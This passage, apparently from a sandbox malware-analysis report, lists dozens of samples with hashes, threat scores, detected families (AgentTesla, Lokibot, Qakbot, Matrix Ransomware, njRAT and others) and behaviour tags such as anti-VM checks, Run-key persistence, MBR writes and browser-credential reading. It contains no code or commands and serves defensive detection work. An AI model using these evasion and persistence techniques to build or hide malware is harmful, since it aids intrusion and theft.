      548b424bedcb831086fb9ab5b6e284a7a71a53e430acad99155153a869844570

    • SHA512

      c046022a16f572eda5f60484d61190491579ee0d9d883d8f760859bbde0730dcfe4a603f847162d8901f6a87140da6a9c53134e8b7c2f9fa6192584765e94ff6

    • BetaBot

      Beta Bot is a trojan that infects computers and disables antivirus software.

    • Checks whether UAC is enabled

    • Suspicious use of NtSetInformationThreadHideFromDebugger

    • Suspicious use of SetThreadContext

    • Target

      foo/28408caa2961caecd35c9f8f7c1aecc5

    • Size

      290KB

    • MD5

      28408caa2961caecd35c9f8f7c1aecc5

    • SHA1

      2df15d3bc4f7623ca3a18665b3c666ec8b70baa6

    • SHA256

      fe99d5ab8be0c9830fd97c1ed127b0c236da75b43a42a58fcd46cb8d46dc3c34

    • SHA512

      a4fdb80d3ac39a2fa46f19c8b5a803ded144e97dd7a3f194177ddaba15b8e0a0486e7b4de2e8c9c957eac4398487fe5872e54ad8e866e68e0beb283c937d0cbd

    • Target

      foo/29682275a385f42634ee312db7f666e4

    • Size

      8.3MB

    • MD5

      29682275a385f42634ee312db7f666e4

    • SHA1

      660661c84c925dd781c327bbdd519b89bcf378c3

    • SHA256

      9bf25bf1e0f9bfb8381dc1ec57ee256ef77d294259468fc17bbab9fe50b8b4a3

    • SHA512

      c03ee099bfb533ae5f88a31499e428588de0bbbc2864a057873355d26b89a9a3b8da73a706fc08e8633b09e73018fbf4406fd2c8cc7738b605a0b2eeac23db36

    Score
    3/10
    • Target

      foo/2de7b886ed3bf5455694d76ac69a96a4

    • Size

      99KB

    • MD5

      2de7b886ed3bf5455694d76ac69a96a4

    • SHA1

      8e80636a30b25b9aba51bc048882a43b9914f631

    • SHA256

      1cc983ae1831efb88cafacc5e7efcdf60ee5d3637a3d8e2336f14fa2bf53e606

    • SHA512

      abe16eb7e94e947507a3276e3d94be5e4c56055263e5aa4ebb5449dc969401d3659460bc152a67001a01874054a4968fcaa9720f81514ab6560ae18cd637f9ca

    • Tofsee

      Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    • Windows security bypass

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • XMRig Miner Payload

    • Creates new service(s)

    • Executes dropped EXE

    • Modifies Windows Firewall

    • Sets service image path in registry

    • Deletes itself

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext

    • Target

      foo/2e00df497f82c0bf215548969fefc18b

    • Size

      8.6MB

    • MD5

      2e00df497f82c0bf215548969fefc18b

    • SHA1

      6f1f6f9e8f40055644670378da81ea668c8b69f5

    • SHA256

      3386ab7ec029dca692f7f8e3214fcfa97f88c42cf384807d9a5c56a146e89ed9

    • SHA512

      0ce197d3f63995265d4c9d8c51ffd2317065c8d653dd8135882ba0fe2201fbb3cfff66b8a88a6f2626a292918cdeccda026b6f9430c6d57196c162688dd03a0b

    Score
    9/10
    • ACProtect 1.3x - 1.4x DLL software

      Detects file using ACProtect software.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Loads dropped DLL

    • Drops file in System32 directory

    • Target

      foo/2e90a15707ad3eb4cd06bd8a05463922

    • Size

      403KB

    • MD5

      2e90a15707ad3eb4cd06bd8a05463922

    • SHA1

      5190382aaac9a76a31315f3e3b3bc6b12fac2738

    • SHA256

      b594e7917381e1089e150150bb0db36cef541d0226fec4ff681f3cf32cb8be36

    • SHA512

      1838ba984c52c21621e68b87fb257590255085177a073b3b0d318802fa24a79317fa96a07d87068ae8b57418adf2fbf93cf9a313e20ba19b6a82420f00427358

    Score
    6/10
    • Target

      foo/2f215e008c6a7d8886c578e442b8f1b0

    • Size

      200KB

    • MD5

      2f215e008c6a7d8886c578e442b8f1b0

    • SHA1

      a4409e2c333fa3aaa4e0b718775d325fcf76cb41

    • SHA256

      6903fcc0ca7851ca2aad10ae4ebc3533eda1f1d85f7f0f6df39082d6c562b867

    • SHA512

      4cf2365b786d5894d335c2fa421901fd45dcac709974eda1ed2bb2f8d7c443c20b5975af17ee337d81986909c03786800929a36d53ed317a353a2e88bb621a3c

    • Target

      foo/30bc06d0add076dd6500fcdfbc12643e

    • Size

      322KB

    • MD5

      30bc06d0add076dd6500fcdfbc12643e

    • SHA1

      def54b6b4ca0d0ea952510cb8c0e3ee2a5f85a3e

    • SHA256

      5038cf5a6ef817ad95a57c8cc8da89e66e24c83fafef450618b4d3e18ebdd9b4

    • SHA512

      6576b45177e01f0c8bec1e1728ed69df450b2f6f7c62aeb8ba85df54b48a37e90925eddfbbce4080fd44c08266a5fec92cdfcb6efb7518e1e808b3b488686314

    Score
    10/10
    • Imminent RAT

      Remote-access trojan based on Imminent Monitor remote admin software.

    • Drops desktop.ini file(s)

    • Target

      foo/312e67dc35992949937d1bad6ba529f3

    • Size

      476KB

    • MD5

      312e67dc35992949937d1bad6ba529f3

    • SHA1

      b1b33ac2b7b82240369b43289c9dafe498df63d5

    • SHA256

      0a58ffc4705b353154ea7347fd495b0e34d25da5f3094f52d43e312ea8163f81

    • SHA512

      9097b5896ea47777fbe389e0cf75ebbdf943695559db78b2fd06aae400ab8a852d7d216fe7687e78418404d238092eec77b4e9601dd33fe34accab0a2791dbb3

    Score
    4/10
    • Target

      foo/383497fda5ca670a06dc688443c2011b

    • Size

      623KB

    • MD5

      383497fda5ca670a06dc688443c2011b

    • SHA1

      c622ebf694003368c3246e166a3a7bfc6b787652

    • SHA256

      d84d8ebcdfb0abcd821c24197517a5e329a1a6ae8e534509db78899b147cd60f

    • SHA512

      5f1f854690f9743a09fcdd0b6be43fd09af3eb5bc0f1ee4c20659458e34f46c33eec8eb651e569315902d99a12a217e5dea750411effca79485fa343c24d0129

    • Matrix Ransomware

      Targeted ransomware with information collection and encryption functionality.

    • Executes dropped EXE

    • Loads dropped DLL

    • Modifies file permissions

    • Adds Run key to start application

    • Drops desktop.ini file(s)

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Target

      foo/39555eb0403a69906729713ad20888ec

    • Size

      502KB

    • MD5

      39555eb0403a69906729713ad20888ec

    • SHA1

      3496ed1ff1c3ede32a025b33eec820cdf5512ca9

    • SHA256

      7926fbb4fe0c69379b2c1ac217cfd0a09ff9a73e48c24d3c464785119d8ab349

    • SHA512

      674c3048cf7798c407138474a40b318f1465d920493d6a057de0cbd6befb66649a0f9e0059b042c1141cad40ae38800c8b98a9ea3140d6ae998b88aa1d2ec9ae

    • HawkEye

      HawkEye is a malware kit that has seen continuous development since at least 2013.

    • NirSoft MailPassView

      Password recovery tool for various email clients

    • NirSoft WebBrowserPassView

      Password recovery tool for various web browsers

    • Nirsoft

    • Uses the VBS compiler for execution

    • Adds Run key to start application

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    • Target

      foo/39e5310f67f0b1bf98604a2e0edb9204

    • Size

      104KB

    • MD5

      39e5310f67f0b1bf98604a2e0edb9204

    • SHA1

      3a2d3638449252c6d890c4061bcd92e733a7cdb3

    • SHA256

      4f91d0b1c9a27ac005f37227e1ef9f9e796cbbe896be2407d23a89734ddbdf3f

    • SHA512

      30c373c76c2910d4aa4671c06fde272ca40d012a353f7c6004643c95da5a486c124662bd303b42501ac29b801cdcfc05cf853764477184d247ffbaf4f02838c8

    • Target

      foo/3aba72d1f87f4372162972b6a45ed8cd

    • Size

      364KB

    • MD5

      3aba72d1f87f4372162972b6a45ed8cd

    • SHA1

      62eaec946e6c05d6279737e9e5583831beb383e8

    • SHA256

      31bae2c85740d091f58896a36a461191d666e33f3ad5d8a4e529bc74bf024b6c

    • SHA512

      d66f28238e74c13057da5f8a6d89807d7d513c542dd65d5005334e360b22d82cc4be7826ce1e3d1372c44c68a4acd8ff662adddb4affffbadfd174ccbd016249

    Score
    1/10
    • Target

      foo/406c9b9529109f835fe7292e6cf3fefe

    • Size

      468KB

    • MD5

      406c9b9529109f835fe7292e6cf3fefe

    • SHA1

      80a616526044d8b3dfe9848b73c8873f474b27ae

    • SHA256

      eeaed429ed196822dfded9099479bbb7d9cd48cdb96a986627512e607badfa66

    • SHA512

      ce013422daaea03d9d31c713cc6ce1e0349b862f3d2b52ef9ee151b6e1e20ea0724e71000d6f2d10b953cd3bcc5b5e2dd69cbfe858b451811a2152c623e7a92d

    • AgentTesla

      Agent Tesla is a remote access tool (RAT) written in Visual Basic.

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads data files stored by FTP clients

      Tries to access configuration files associated with programs like FileZilla.

    • Reads user/profile data of local email clients

      Email clients store some user data on disk where infostealers will often target it.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Adds Run key to start application

    • Drops desktop.ini file(s)

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    • Target

      foo/457cfd3e7a53e7500f8206b3ea300aca

    • Size

      193KB

    • MD5

      457cfd3e7a53e7500f8206b3ea300aca

    • SHA1

      7426d503db90a0795e279968009ac03853cdfbed

    • SHA256

      feb51e59044de8b60c0e72553b2cfc7aea655af83068cf934525eec303d65c10

    • SHA512

      cd1896539b4f1732ee6be803ca5eb012d1ed69d0bb2be71dd09d17fc7d831a2a7bbfb78cee1b1a6545c7bf00c1855dc502ce1ab0ace7432cabc2d2a00db8df43

    • Loads dropped DLL

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Installs/modifies Browser Helper Object

      BHOs are DLL modules which act as plugins for Internet Explorer.

    • Drops file in System32 directory

    • Target

      foo/4761e4b165f62d326b9032d96329e460

    • Size

      793KB

    • MD5

      4761e4b165f62d326b9032d96329e460

    • SHA1

      59aaeba76ac34841d60aef175309161d2b5e4992

    • SHA256

      5f6884586533f6065ec2c0557e63e1b5865f0b22c42a386a338cc211ec1a308b

    • SHA512

      c2ce8e91fcd7697b5f7b6e5a7a62f2552be4388f3fbc1dc0003893edb133731160736852f2fab62c18f06d8f773e7dca96ade6e151b2c0163599d49269e46a9d

    Score
    8/10
    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Target

      foo/487f1b1f30212eaa9104c084a667f104

    • Size

      5.7MB

    • MD5

      487f1b1f30212eaa9104c084a667f104

    • SHA1

      e562c8d364fea1f1f4524c30a0606598b8814096

    • SHA256

      8b72156895f47b7f216b544937a46a3909bc07134ebac1c586de7aac3eab18a5

    • SHA512

      c6ad92308792d2135ce918fcc1b88a15a3c928c30a99de2366f7477df9196dff9d287e8d84c2176f4b7385adee5b2601402cc2deee84d26060057ea044d59ddd

    Score
    8/10
    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Loads dropped DLL

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Target

      foo/4a74c9f378007412ec2c8b2eea6da4cf

    • Size

      512KB

    • MD5

      4a74c9f378007412ec2c8b2eea6da4cf

    • SHA1

      7ed849c7e9f2c70af40a6feb46d57bd5f06c3a8d

    • SHA256

      4ef7144d88b296b15236dd8866cf50d4f20657551da60897ceb2e67ec8bad793

    • SHA512

      5043709c2e1f1b339df4cd035ad959746ebe6ecbf43ee2ebe9718367581a6c557ccd3a0c3f2615e8fe0ce6ac1efc169348ddafde77f2d82984eb945d09d4f4d2

    • Lokibot

      Lokibot is a password and cryptocoin wallet stealer.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Adds Run key to start application

    • Suspicious use of SetThreadContext

    • Target

      foo/4b2d7854b47943b118e24c6ec79b974b

    • Size

      4.2MB

    • MD5

      4b2d7854b47943b118e24c6ec79b974b

    • SHA1

      e80270395d82212d41e64f8afe0203b8061bf9fe

    • SHA256

      ccce7394fc1a6e1730f440e2d20183c830f30bb7cb446a54ca18277974205503

    • SHA512

      64216c5bbd286496e33adb03e80e1aec67a2c6e2f8f1088804dc95182d42e978aa77f8366c384b4bed5eebdd5e15ad5484bf839b6fb8a35799819c64d05f3162

    Score
    8/10
    • Executes dropped EXE

    • Loads dropped DLL

    • Target

      foo/4c49c2496ae538bcec9e1510f3eb8eba

    • Size

      176KB

    • MD5

      4c49c2496ae538bcec9e1510f3eb8eba

    • SHA1

      2d62b087f6a1504b57fe65fef38ee8c831bf7aa5

    • SHA256

      a149cb7f8d29506837ecad9e9b7e7a1e8fd23ba5716c653b2bd3d9bac9eccd6e

    • SHA512

      8cfecc9d516603a41c0801f75cec51b318d39b4985745439a433cfc0c1eded9dc8d5c2258ff7de358191211041345eb7c74e969dd69262cf09cb724eb59333b6

    Score
    1/10
    • Target

      foo/4cfe8f3aa1592035b9a2cdb2c4f54c77

    • Size

      2.0MB

    • MD5

      4cfe8f3aa1592035b9a2cdb2c4f54c77

    • SHA1

      ed8024ea02ca996e74c40459ff35c78cefdf111f

    • SHA256

      0aa9b861be9e293f3d71e39949141e7c87c52e3f4f8b0ea4d26b768b0c188bc2

    • SHA512

      42cc40eb614b4afbf08ae8646c7511ffcdfbf3c3af924ff20d40b5499acf1f1136e4809aa5428c5b260e4b8676041cdb70ef74904b0c09ab5944db1cf89cff3e

    Score
    9/10
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Identifies Wine through registry keys

      Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

    • Suspicious use of NtSetInformationThreadHideFromDebugger

    • Target

      foo/4ea45460c3e7c3d8486d3f7bec90c613

    • Size

      6.0MB

    • MD5

      4ea45460c3e7c3d8486d3f7bec90c613

    • SHA1

      303c290738a2d89d4bbd365da80650ef5a55bcab

    • SHA256

      a0ea757d9a9ec9e09bc806dbb1526fb5b90692ccc1f31aded8e3dbd0abcde5ec

    • SHA512

      1ad7731246a7dfce4cc656481af68f8f4f37d511b453431f32dfec6078313eb636047031d9341e4e62b969ae95c600877b9c49a28168e3c7e02de4371be88228

    Score
    8/10
    • Executes dropped EXE

    • Loads dropped DLL

    • Target

      foo/52d6c59fcfe73048a240c7fdd1f04d7e

    • Size

      9.7MB

    • MD5

      52d6c59fcfe73048a240c7fdd1f04d7e

    • SHA1

      e8af78f67fb5859b54d10e865b7a1070b4d34f46

    • SHA256

      93b36133201cfe77b1319c72d9b0b4ed471a6337a58f6b30f926f1786159ec82

    • SHA512

      cfd767ea4063205a57894d9d8f09f205c8e9bc71b8052985076496c136b98f037aa7b274cc225c5ad759ddc530ccb6201cacdfa8c6a015311331f2589b4ff8ca

    Score
    7/10
    • Loads dropped DLL

    • Target

      foo/55fc11ec67a00177d047d5abc84231e0

    • Size

      35KB

    • MD5

      55fc11ec67a00177d047d5abc84231e0

    • SHA1

      acbd513fa686cdbc50ae7f69d41fb8384255658a

    • SHA256

      d65e0dea8a361b12e8d278afbf103d0bda2753fd9c1e14a779bc92fbc4c1e144

    • SHA512

      206a0f9fe46bd39910f6224f41dab028b74312b1ed9a3052f97f44771a5d43b01e32ba5b3bab40adf7b877a1d48371d140dfa4b3241ab2b54d8bfc3cc74f930e

    • njRAT/Bladabindi

      Widely used RAT written in .NET.

    • Executes dropped EXE

    • Modifies Windows Firewall

    • Drops startup file

    • Adds Run key to start application

    • Legitimate hosting services abused for malware hosting/C2

    • Target

      foo/59f0fbc29bace019804b8a181ce75a06

    • Size

      568KB

    • MD5

      59f0fbc29bace019804b8a181ce75a06

    • SHA1

      c3a44b6ea913ce4eb32f04930ea60043d79c3a0a

    • SHA256

      b2e8676b7a04f3582470aa3de91b39ba731fdf072907d8d843d052d73c87405e

    • SHA512

      a68ce42173331381d1618929cdb7cff9d3220afd151856c62c6eb015faaba61c1141a7bb2af5d1b58b1732cafa2286acbd2c95115f2a789c7a3454bc96b63ce2

    Score
    1/10
    • Target

      foo/5b1c0df2be80006ec3af6a5eeea17ecb

    • Size

      777KB

    • MD5

      5b1c0df2be80006ec3af6a5eeea17ecb

    • SHA1

      b2353f17d51fc76dec8681df4526406e7c9113a6

    • SHA256

      6ad2f4284d0c364d7a2664100ec5448607d1e064c3d1a65e4e737769ba3cda25

    • SHA512

      607334838181a37883132906e562944cd54221f28c2efa279cade7ce8829550d20c11d864797118ff476497144cd84218282bb97cd4b4cf8fa13f753459ad7eb

    Score
    1/10
    • Target

      foo/5bc72a1ae433663758319d97917b77ea

    • Size

      5.5MB

    • MD5

      5bc72a1ae433663758319d97917b77ea

    • SHA1

      889f6f4ec2347ded9924ff9a51c14d0e0347feaa

    • SHA256

      c84eb9ad415a282bbdb0adced711af66631e29a4e0606a566f1477018f9315f5

    • SHA512

      8e3000e76531bc8332003016ff926e9330ef28d154f8f04d2f522b6cb822df10323d811fc5116919944e74483fd3bcded30bbcc0b14fd26e5041a68dcdace551

    Score
    8/10
    • Executes dropped EXE

    • Loads dropped DLL

    • Writes to the Master Boot Record (MBR)

      Bootkits write to the MBR to gain persistence at a level below the operating system.

    • Target

      foo/5d33050f0514054c49f2bc2ff9abee2a

    • Size

      272KB

    • MD5

      5d33050f0514054c49f2bc2ff9abee2a

    • SHA1

      2cdf78701185d2d773666af2d8ea4e0b04781bf9

    • SHA256

      65b2fb3df4cf7da2980a6af696bdee3df2effd65228cc56f51a5d8fb29469e68

    • SHA512

      e22b419fd86cc4d0af4c48c0a53abf1afda4715dd92acbb3296f4e1f32a588364c1b48c9eb3b2214c1f834d79ca541cdd79a13d8975d91337970d7cf320f61be

    Score
    7/10
    • Loads dropped DLL

    • Target

      foo/5d9775622b5e7123d5796d4de5dc2839

    • Size

      133KB

    • MD5

      5d9775622b5e7123d5796d4de5dc2839

    • SHA1

      176ef2d48f75b9be26882040e69fc95fa8b02e5b

    • SHA256

      a57aefff0656b1266ff25b5e4972e6829ffec6a5855597587e026d28881dc62c

    • SHA512

      ffd89d99223fabfe4def0b27bab031ea76f50fd3be36b27f3d76754bb333784f91985e1c88a7e1991ee334ab98b42f3b0cb2e38dcb5d6599bf0d98ac8f73089e

    Score
    8/10
    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Target

      foo/60121ea2ab380455f7e143cd9438443e

    • Size

      98KB

    • MD5

      60121ea2ab380455f7e143cd9438443e

    • SHA1

      091fd74c5caebd9f53c34781ad6b0241883fe698

    • SHA256

      b8f7c90cd170ba8c79c472997c17509e2d241a54a9cef7efea4dac23b043afe8

    • SHA512

      3f42a0756999d6441721f8d4663c8af677c895c4e11ddff25d7a1216b3b4a015b7d3763c0e06f616f73eb5e9df3b42e07baf8d5ec910632f3e275c8d2fd388e6

    Score
    9/10
    • Clears Windows event logs

    • Executes dropped EXE

    • Deletes itself

    • Loads dropped DLL

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Sets desktop wallpaper using registry

    • Target

      foo/62565a39c4a264e48e0678edad5d60fd

    • Size

      856KB

    • MD5

      62565a39c4a264e48e0678edad5d60fd

    • SHA1

      1dc0f3920082e9f3e789d5d1587d9c7b47d58a5e

    • SHA256

      d9d3596268e269cb48aee92aaa47a50f785f8568f319aad812af163da28e7a40

    • SHA512

      9b851c15b072ba5e0b316f2f02ff49fbb483fd5b4545d7c225f27ddfe8ef0fc99747a5b14bbad6b6373c1b562984c22d52d83c65970ce5ffc5209a5dc1e715cc

    • Qakbot/Qbot

      Qbot or Qakbot is a sophisticated worm with banking capabilities.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Target

      foo/62a3fd9b4932e59a7192813c22617764

    • Size

      453KB

    • MD5

      62a3fd9b4932e59a7192813c22617764

    • SHA1

      202a619fdab056d51bde34db8683839feccf0da5

    • SHA256

      8b433a97defbbddb0922aa477226ab820f388d9d38ba10d8d8b89917053880be

    • SHA512

      87846d0a4d55c209dc5dcdec1e9c9dee7beedce840d099df4fa5ced0e814183162d25a3e3ae8b56dc533ac9dedfc612631559da7e5cc19985a6bb3d0ff80ba54

    • Imminent RAT

      Remote-access trojan based on Imminent Monitor remote admin software.

    • Executes dropped EXE

    • Deletes itself

    • Loads dropped DLL

    • Adds Run key to start application

    • Drops desktop.ini file(s)

    • Target

      foo/63e9ce22dbf66934fd75c77bc84954d0

    • Size

      563KB

    • MD5

      63e9ce22dbf66934fd75c77bc84954d0

    • SHA1

      c48e6b5974e2f10c5c4e0426a898fbcf7a67c8cf

    • SHA256

      550d461697099ebb3a5ee86336bd3358a05850f2835738d6520a552527b096a6

    • SHA512

      e14692ed9673f2926ea62b6e9f128953fa79b1ce3df8452656e11e479af7a187784a5aa893719d3e8438e8697b7793292d46a0a9adc6a400e610eb288976036a

    Score
    8/10
    • Executes dropped EXE

    • Drops startup file

    • Loads dropped DLL

    • Target

      foo/6497ba06c339ec8ca438ddf0dd2f8fc5

    • Size

      29KB

    • MD5

      6497ba06c339ec8ca438ddf0dd2f8fc5

    • SHA1

      4287ee2103467196df93fad515a844bd2b94df78

    • SHA256

      dcf7b759aae3ce6597eeca586238419728e432770451522a0f0d1873463aac20

    • SHA512

      45b97bcc1dbc060cb5d461fd945759c60fa943f18e1b777592183fdc6cb9719578669d5ab914e4e0be1fd3e2356e88bd2e54f71f13b586c9892d034b751c5277

    Score
    10/10
    • LimeRAT

      Simple yet powerful RAT for Windows machines written in .NET.

    • Executes dropped EXE

    • Loads dropped DLL

    • Legitimate hosting services abused for malware hosting/C2

    • Target

      foo/698cc868cdae13a5cc744020ec00e331

    • Size

      2.5MB

    • MD5

      698cc868cdae13a5cc744020ec00e331

    • SHA1

      cb498c95868eb907422351cff294476fa474f856

    • SHA256

      2e0bbdb1882e670a907d79987fb5ea80a050f7a57b17196bdd2ec42e3c4e2b95

    • SHA512

      e8b7631c4bc2c76a4ed9b706636f6bd25c6556d1bcb1c21e296022d030005cee29f692f5f773fe47511b66e3bf45005f7d0e7b4b3cc19cde38632029759e2b3b

    Score
    7/10
    • Loads dropped DLL

    • Target

      foo/6f2c5c31fefa00afa2af1adcbdd93ad5

    • Size

      6.1MB

    • MD5

      6f2c5c31fefa00afa2af1adcbdd93ad5

    • SHA1

      f460f3caff95e713dea4105ab48aa06331ea5d5e

    • SHA256

      00ba0c7b8b90f5ef0a432c893ef0f90fa91b1e7c4a74d1c49d8fc9a63c6e8a17

    • SHA512

      fe9564cecf0997cbfefe5818688261f894179101a71315f4351addd35d0e3539e2e67f79fa9e45bc02f57bd8e325cea9763978df52522fc4d7774e70c18daa13

    Score
    7/10
    • Loads dropped DLL

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Target

      foo/798f5e61531f527821a490a15ef957ba

    • Size

      100KB

    • MD5

      798f5e61531f527821a490a15ef957ba

    • SHA1

      8b9cf50467ecccda66fe065e52994a0df369b139

    • SHA256

      1b2d37bb6b98fb77496db754816296b740a2fe7a8e3d0a5263a8002d16a1b5f9

    • SHA512

      9706113b056b96f4c5f89a3991a2adddbe1d7a6e44d03ce919edf88ead8e500eed4b84d5b2886ec4f733003bd751ba9653ad810bf7b8046aa94711f2552d628e

    • Modifies Windows Defender Real-time Protection settings

    • Windows security bypass

    • Executes dropped EXE

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Loads dropped DLL

    • Windows security modification

    • Adds Run key to start application

    • Target

      foo/7aec86c6c4cc35139b7874a0117e4451

    • Size

      707KB

    • MD5

      7aec86c6c4cc35139b7874a0117e4451

    • SHA1

      b597ea073119727156f95b5224d6db7ddc370bee

    • SHA256

      48749cd789a40b8358f06ce41100985b4544162df8ed47bfc17c72242756d50b

    • SHA512

      7f8f596607a925bb72b91b7a9fc78d9094ec4a5a5dc41c866f9dcf961daee52dc4052d2ace663b021301e1cb715c3ba9f209ddc7e48ef07b46283673b647c561

    Score
    1/10
    • Target

      foo/84bf6e1a8fcd94cf6cba6ac7e2a95b64

    • Size

      685KB

    • MD5

      84bf6e1a8fcd94cf6cba6ac7e2a95b64

    • SHA1

      cc788b747b956cac871f55be59995e4bf57901db

    • SHA256

      f2e8ae7bffb3210efb4a5baf9ee1875e1143d2d73614adb292b44bb143b3ffd9

    • SHA512

      058fd21be218125c20aa1a715d9c53151ed68283465a2e2a8acdb534e95818bc8f9b99a74a13c963c2839b3955e38f217d8475fafd91eec0eaebeeba152e6b65

    Score
    8/10
    • Executes dropped EXE

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence.

    • Loads dropped DLL

    • Target

      foo/907b7d9a23ed7821abb700fcbe1c9bb3

    • Size

      3.7MB

    • MD5

      907b7d9a23ed7821abb700fcbe1c9bb3

    • SHA1

      6caba04b65d28c5a0d0666572c40022fa1f1acca

    • SHA256

      e37ca180d6f18e361f5cbc3f6c6f0ae4d301018e45891b32cf93da490d62f607

    • SHA512

      d407ddae4f820e1aff994adf9e88952d5756fd1c0b6eef58e28a72fc7c455af991fb4294931ebb2eaee5133d2e56f72f5013e45a1b5d0fe17416d1b0583346f1

    Score
    8/10
    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      foo/928f1db0c63d122f0183686a3bdfccee

    • Size

      842KB

    • MD5

      928f1db0c63d122f0183686a3bdfccee

    • SHA1

      8fb82a9595afb94e6e77a9ac3555e2b1abfdbbb5

    • SHA256

      78fabf339b726203334bb592812ab42c8652ab37535eeccf2e457df257d7a881

    • SHA512

      6f500e95cdb91a07fb0af0aff671054f6628752d563c34a0ad691c2727ffd9f7107da71f7c84550a95a2850eae1bb60b5271fbca7d648d88748a28859310ccb5

    Score
    1/10
    • Target

      foo/9401b0788dc22eeb1dace02d23a9596c

    • Size

      552KB

    • MD5

      9401b0788dc22eeb1dace02d23a9596c

    • SHA1

      b5dde6f4feaec905d14dedd1d7957e556797e84c

    • SHA256

      048d9773dc60db5173e4cc0ccdb9eff1ca61e2a7bd1b7e357388d9cd8e94ada5

    • SHA512

      5d3796bb2e9c5a1753a7ad9ddff26eed7f1289196c5d40b0be946a52b3818406cf9b7b776f677c5e252b2eb294077034aaaf4cbe05cf64a66eeeb0466965264d

    Score
    1/10
    • Target

      foo/97dd8726304f889ef12ef1beb510be84

    • Size

      679KB

    • MD5

      97dd8726304f889ef12ef1beb510be84

    • SHA1

      2358917da7fcf07e9b165dfb3961b9212e37b671

    • SHA256

      424ef529e699a29eb1324f71f56a3d0728079926ea793cb8ebbee71ddbfeabf1

    • SHA512

      d141a224a4c55b4b4c7ef2348b5accd7a3ba9bebb0dd5eaafbc08060746a0a9082c7ab93a022b20ac2fb2255293430da729d995ab5b0106ab064c0c0c5b4eeb4

    Score
    10/10
    • Target

      foo/9b8c48e6186718b7b290ceed9369a1a4

    • Size

      826KB

    • MD5

      9b8c48e6186718b7b290ceed9369a1a4

    • SHA1

      816a6a15054568dd2f51e25ac73178f9a0182d82

    • SHA256

      f05ec8838752a3b917acbd2e742e03646f091ef5ce97bf1eef75810cebbfc93b

    • SHA512

      6ff8ac1f9b6c296679458022b375548e8c322809e4a1887551ca0cb553f0cf864e43361edd6e1a2ee8a9b3b3a5680a95689b2bf91785aea68baaca6be91339b9

    Score
    8/10
    • Executes dropped EXE

    • Loads dropped DLL

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Target

      foo/9cde71abfd2a6aeb83cdd233cbc04fcd

    • Size

      146KB

    • MD5

      9cde71abfd2a6aeb83cdd233cbc04fcd

    • SHA1

      a1cb6ad95fe9df8fefe9dd0753b88cfc852368f0

    • SHA256

      e742096e51fcd3e8c19d43cd26dd25235f04a0af5a64343754e2e46bb90c3816

    • SHA512

      8a6a152626b9b912089e6c68193788fbc2258f56b359fa20d0b09f4033cdd357d9e661de6c0a8378aeaf2c66f6ccef8f86cc624fcf97d90f004213eb2ebbfe04

    Score
    6/10
    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Target

      foo/9d3438ba1dbdbcc2a65451893e38004b

    • Size

      2.0MB

    • MD5

      9d3438ba1dbdbcc2a65451893e38004b

    • SHA1

      d981bd3d2abb18bcd1421c9de38bf1854f4c13b1

    • SHA256

      8f04cf8f8be775e065bce4ff33ca3afc7711aea57b5fb91c488bc03af1df58da

    • SHA512

      6818546c2a967a0d63814e77e339656939eaae510591e3888b8abb8626d89132ac51774efe0912c083072b2314040d1d5c2f0ccc463669a7bc34b2d134b714ba

    Score
    8/10
    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      foo/9f88187d774cc9eaf89dc65479c4302d

    • Size

      326KB

    • MD5

      9f88187d774cc9eaf89dc65479c4302d

    • SHA1

      4c1e5e0bb72c78c4ce0d37aed939478aaa35a94f

    • SHA256

      5ee12dd028f5f8c2c0eb76f28c2ce273423998b36f3fc20c9e291f39825601f9

    • SHA512

      e03a4000bc7cac0332f2060ad58cadbe65a4283d012606f8395a6e63c42fa5e7b98f8ebf40d438c56332e19e845658d70a7ef99d2343323bd701e56c3b0cd0e7

    Score
    8/10
    • Executes dropped EXE

    • Deletes itself

    • Target

      foo/a17bdcde184026e23ae6dc8723f73fcf

    • Size

      784KB

    • MD5

      a17bdcde184026e23ae6dc8723f73fcf

    • SHA1

      faea5147df4768b101d0fd214c7fbf7a9cb048a0

    • SHA256

      a358e56c91218b5f21d54556fb7aef5de158da4764c9cf8e5d71e3e41ff4841f

    • SHA512

      90d58f8e290bc751fd3f945ad5de218f93d8605578c87972359edcc9e87d84473f2ebd54452c09d2bc9ba4d11f9412742e9f1d3bb9c9cd67a17cd58693624616

    Score
    9/10
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Drops startup file

